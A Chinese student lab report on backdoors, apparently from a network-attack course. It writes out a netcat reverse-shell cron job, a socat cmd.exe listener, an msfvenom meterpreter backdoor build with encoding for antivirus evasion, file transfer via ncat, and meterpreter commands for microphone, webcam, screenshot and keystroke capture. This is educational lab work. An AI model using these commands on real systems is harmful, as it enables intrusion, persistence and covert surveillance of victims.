任务一:使用netcat获取主机操作Shell,cron启动 (0.5分)
任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分)
任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
2.基础问题回答
crontab
将其设置为定时启动
ipconfig
指令查看本机IP:192.168.80.14310
端口nc
指令的-e
选项反向连接Windows主机的4310
端口ifconfig
查看IP:192.168.80.131
2、 使用nc
指令监听4310
端口
3、 建立连接之后,就可以传输数据了
后门就是一个程序。
传统做法是:有人编写一个后门程序,其他人拿来用。
升级做法是:编写一个平台能生成后门程序
- 基本功能(基本的连接、执行指令)
- 扩展功能(搜集用户信息、安装服务等)
- 编码模式
- 运行平台
- 以及运行参数
- 全部做成零件或者可调整的参数,用的时候直接组合,生成一个可执行文件即可。
典型的平台包括
- intersect
- Metaspolit的msfvenom指令
- Veil-evasion
学习如何使用msfvenom生成后门可执行文件Meterpreter
参数说明
-p
使用的payload。payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.-x
使用的可执行文件模板,payload(shellcode)就写入到这个可执行文件中。-e
使用的编码器,用于对shellcode变形,为了免杀。-i
编码器的迭代次数。如上即使用该编码器编码5次。-b
badchar是payload中需要去除的字符。LHOST
是反弹回连的IPLPORT
是回连的端口-f
生成文件的类型
>
输出到哪个文件
4310
端口2、 在Kali环境下,用crontab -e
指令编辑一条定时任务
crontab
指令增加一条定时任务-e
表示编辑15 * * * * /bin/netcat 192.168.80.1 4310 -e /bin/sh
意思是,每个小时的第15分钟反向连接Windows主机的4310端口socat
是ncat
的增强版,它使用的格式是socat [options] <address> <address>
,其中两个address是必选项,而options 是可选项。socat
的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address
就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。
socat.exe
文件的路径,在添加参数一栏填写tcp-listen:4310 exec:cmd.exe,pty,stderr
,这个命令的作用是把cmd.exe
绑定到端口4310
,同时把cmd.exe
的stderr
重定向到stdout
上:
socat - tcp:192.168.80.1 4310
-
代表标准的输入输出5205
端口
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.131 LPORT=4310 -f exe > 4310srq_backdoor.exe
4310srq_backdoor.exe
ncat.exe -lv 4310 > 4310srq_backdoor.exe
指令将被控制主机进入接受文件模式nc 192.168.80.1 4310 < 4310srq_backdoor.exe
,注意这里的IP为被控主机IP,即WindowsIP5、 在Kali上使用msfconsole
指令进入msf控制台
use exploit/multi/handler
使用监听模块,设置payloadset payload windows/meterpreter/reverse_tcp
,使用和生成后门程序时相同的payloadset LHOST 192.168.80.131
,这里用的是LinuxIP,和生成后门程序时指定的IP相同set LPORT 4310
,同样要使用相同的端口record_mic
指令可以截获一段音频2、 使用webcam_snap
指令可以使用摄像头进行拍照
3、 使用screenshot
指令可以进行截屏
4、 使用keyscan_start
指令开始记录下击键的过程,使用keyscan_dump
指令读取击键的记录
2. 通过gdb调试,找到0xffffd38c + 4 = 0xffffd390
改好后打开两个窗口,第一个注入,第二个监视
配置好监视的设置
通过本次实验学习到了后门的基本原理,掌握了后门的生成过程和注入方式,对一些常用的后门程序和命令有了比较基础的掌握。
在本次实验中遇到了很多问题,也花费了大量的时间去查找相关的资料,学习到了一些实验内容之外的东西,我觉得这些在实验过程中也是很有意义的内容,了解了更多meterpreter的知识。
通过本次自己亲自动手实践我也了解到了后门功能的强大性和危害性,因此对于后门的防范的重要性也不言而喻。
希望通过这次实验,能够学以致用,用在以后的工作和日常学习中。
2019-2020-2 20174310隋润起《网络对抗技术》Exp2 后门原理与实践
原文:https://www.cnblogs.com/srq111/p/12538883.html